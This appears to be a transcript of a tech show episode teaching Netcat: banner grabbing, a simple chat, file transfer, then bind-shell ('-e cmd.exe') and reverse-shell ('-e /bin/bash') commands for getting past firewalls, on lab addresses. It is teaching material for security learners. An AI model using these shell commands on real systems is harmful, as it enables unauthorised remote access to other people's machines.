So today I want to talk about Netcat, which is kind of like a TCP/IP, UDP read-write tool. It's an open source tool, it's cross-platform, and this is one of these things where I just want to get through this stuff because it's a real fundamental thing that we're going to be expanding on a little bit later when we start doing exploits and stuff like that. It's what could be considered the Swiss Army knife of TCP/IP, or at least that's what the developers kind of call it. And we are going to just learn by example here. I want to show you some of the nifty things that you can do when you're sending TCP or UDP or listening to TCP or UDP and just reading and writing those packets over the wire, having fun with it. So let's take a look at these quick examples, and I think you're really going to grok how powerful this tool is. So first of all, if we can go ahead and read and write TCP, let's go ahead and connect to an HTTP server, just like we would with like Telnet or a web browser, something like that. I'm going to fire up Netcat here. I'm in backtrack 4. Grab that at remote exploit, awesome stuff. And it's just NC is the command, V for verbose, and I'm going to go to 10.10.0.31, which is my web server up there on port 80. And you'll see that I have indeed connected, and it knows it's a web server, www. And I'm going to write in here head/http/1.1, right? And when I do that, I get a bad request. But what's important here is that I actually get the header from the banner of this HTTP server, and I can tell that it's an Apache 2.2.11 server. That's what's known as like banner grabbing. So you can use this tool to say like you're using Nmap or something, and you found a something interesting. You could go and use this to kind of query that service, whether it's like an HTTP server, an FTP server, SSH, whatever, right? And in many cases, you can get version numbers, which are important for when you want to maybe look up if there's an exploit for that or something. We can also use this as a rudimentary chat. So what I'm going to do here, since it's a read and write tool, kind of envision as a client and server tool, I'm going to be showing you a couple of examples here with my machine in backtrack 4, and also my Vista machine upstairs. So like I said, Netcat is cross-platform, so I have it here in Windows, and what we're going to do is demonstrate how we can use it to do a rudimentary chat. So I'm going to issue netcat tac v for verbose and tac lp for listen on port, and we're going to use 1, 2, 3, 4. So now the Windows machine is just listening on TCP port 1, 2, 3, 4 for whatever, right? It's real raw TCP. It's beautiful. So we're going to come over back to the Linux side, and I'm going to issue netcat tac v, and I'm going to give the IP 10.10.0.31 and port 1, 2, 3, 4. And we've connected. But there's nothing really going on. We come back here and look at if I just scroll this over, take a look at our Windows side, and we don't really have anything interesting until I type hello. There we go, right? So we can have a very rudimentary chat. If you've ever used something like TTY on Unix, it might be a little reminiscent. But there's a basic idea of how this is working. We're just sending, it's like a raw serial connection, but it's over TCP or UDP. So let me close that and give you an idea of, all right, so we can send data. Well, with some interesting pipes, we can actually send some files. So let's go ahead and create a file here and send it to our friend, the Windows machine. And this is something that you could use if you wanted to, for instance, send some log files over. It's just a real quick, easy way if you didn't have SSH set up to like SCP file over, or FTP or TFTP or email or whatever. You could just get a file across the network real simple like this. So for that, what we're going to go ahead and do is listen on what we'll consider our server side. So on the Windows side, I'm going to do netcat tac vn and listen on port 1, 2, 3, 4 again. And this time, you can see I am going to give it a little waka there. And we'll come back to that in a moment. Now, we're going to need a file to send it. So I'm going to go ahead and touch Tina Fey here. And I'm going to echo is smoking to Tina Fey. All right. And now we have a file. Let me just cat that, make sure it's there. Great, it's there. So I'm going to send that file over to the Windows machine using netcat now. I just netcat tac vn. And I'm going to give it the port, vn, and then the port, which is 10.10.0.31 on port 1, 2, 3, 4. And now I'm going to give it the walk in the other direction. I'm saying send this file into, and that file, of course, is Tina Fey. Press enter, Connection refused. Beautiful, because we are not listening. Okay, so let's come back over here and say TNFA, enter. Okay, now we're listening, and we're expecting whatever data that we get through there to be pumped to the file TNFA on the Windows side. We run this again on the Linux side. There we are. The only problem here is we don't get like, not like, you know how wget has a beautiful little status indicator when you're like your file is transferred? We get no information like that. Since it's small, I know it's done. I'm just going to, break out of it and make sure it's there. So I'm going to dir tina, there it is, and I'm going to type TNFA, and it's smoking. There we go. So, I mean, it's easy as that. Now, there are two other interesting examples that I want to show you, kind of how powerful Netcat can really get, and then later on we'll talk about some other amazing stuff that you can do. The first thing I want to do is show you guys how you can set up what's called a command redirection. We're going to bind a shell or a program or anything like that to Netcat, just as we did with this file. So in this instance, what I'm going to do on the Windows side is I'm going to set up Netcat to listen, but we're also going to have it bind to cmd.exe, or the command prompt. So on the Windows side here, it's nc-tac lvp for listen verbose on port 1234, and tac-e cmd.exe. Okay? So that's listening for a connection to port 1234, and when it does, it's going to bind that to the command prompt. So back over here in Linux, nc for netcat tac vn, I'm going to say 10.10.0.31, and again 1234. It's open, and just a moment here. There we go. You can see I have the /tools. I can say, type tnfa, and there we go. So this is a great way to, quickly set up a shell if you don't have SSH, or some other nefarious fun stuff that we're going to be getting into later. Now, the thing about this is say like one of these machines was like behind a firewall or something like that. Maybe it was a machine on the inside of a corporate network, right? And we can't just port forward nilly-willy. We're not public facing, and we would like to get back to that machine later from, the convenience of the hack house, for instance. Well, we can't easily just listen on any port, but what we can do is do the reverse of that. We can send the shell to a listener. So in that instance, what we're going to do is set up the Windows server here to be the listener. And for that, nc-lvp 1234. So we're listening verbose on port 1234. And let's pretend, let's go back over to the Linux side here, and let's pretend that this machine is the machine that's behind the firewall, and we want to send it our shell. So in that instance, just like we were doing before with the tac-e of cmd, we're going to send it bin bash. So that'll be nc tac vn, and then 10.10.0.31, because that is public facing, or in this instance, in this example, and then tac-e/bin/bash, which is the equivalent for cmd and Linux. And there we go. We come over here, and you don't really see a whole lot. It just lets us know that we're connected. But if we issue ls here, there we go. We actually have a directory listing, and we can run top. We can run whatever, and we are on that machine. Now, there's a lot of other interesting things that you can do with Netcat, and I'm interested in what kind of crazy stuff you do with it. So definitely hit me up, feedback@hack5.org for that. And I actually have a couple of user-submitted ones here, some crazy ideas that you guys do. Kevin Sean writes to tell me that he actually uses this to tail log files. Makes a lot of sense. You're running a process on one server. You need it to go to another computer, so you monitor it without having to do like a VNC session. Precious Roy mentions that you can actually use this to DD, or to do a disk image of a hard drive from one computer to another computer over the internet, and I'll have links to an article on how to do that in the show notes. Joey Adams says that this is a great way to do port redirection, which we're going to be talking about next week. And then Twitchtastic, or his email actually came from Domain Administrator, so I wonder what he does for a living. Anyway, he mentions that you can use this the same like we showed you with port 80 connecting to a web server. Well, he likes to send user agent Internet Explorer 22 just to really screw with people that check their server logs, and then send the refer from like Lemon Party or something like that, which is quite mean. Anyway, Netcat, awesome tool, open source, highly recommend to check it out, Windows, Mac, Linux, whatever. I have links in the show notes, fun ways to do this, and I want to let you know that we are going to be doing some stuff that involves later on, but right now I'm going to go ahead and let you know that we have virtualization coming up with Matt, and before then, let's find out what's going on with this week's LAN party.